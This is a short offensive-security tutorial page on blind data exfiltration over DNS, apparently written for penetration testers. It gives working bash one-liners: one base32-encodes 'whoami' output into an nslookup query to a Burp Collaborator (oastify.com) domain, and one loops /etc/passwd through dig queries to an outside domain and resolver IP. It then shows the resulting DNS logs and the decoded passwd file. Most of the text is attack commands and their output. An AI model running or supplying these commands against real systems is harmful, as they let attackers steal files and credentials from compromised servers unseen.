Page cover image

Blind Data Exfiltration via DNS

Here’s our bash command:

a=$(whoami|base32|tr -d =);nslookup

$a.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com

Let’s break it down: run this command: a=$(whoami|base32|tr –d =) o $(…):

the dollar sign and parentheses allow us to run a command (or series of commands) between the parentheses and store their output in a variable (a, in this case)

Run whoami (output is www-data) o Pipe that to base32 (output is O53XOLLEMF2GCCQ=)

tr –d = (delete any ”=“ signs)

$a now contains O53XOLLEMF2GCCQ

Then run:

nslookup O53XOLLEMF2GCC.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com

You can use burp collaborator to get this domain and check the queries if you do not have a domain to use.

You can also automate this with a loop to get longer files and info. DNS request names can be a maximum of 63 characters, so this is not an issue for small requests:

cat /etc/passwd | base32 -w 63 | while read L 
do 
     dig $L.data.rootshell.be @192.168.254.8 
done

Here is what the DNS logs would look like:

$ grep 'data.rootshell.be' queries.log 20-Apr-2017 08:32:11.075 queries:
20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query:
OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootsh
ell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query:
YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootsh
ell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query:
QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootsh
ell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query:
6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootsh
ell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query:
GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootsh
ell.be IN A +E (192.168.254.8)


...


And here’s the decoded /etc/passwd file:

$ grep 'data.rootshell.be' queries.log | cut -d ' ' -f8 | cut -d '.' -f1|
base32 -d | more
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

Last updated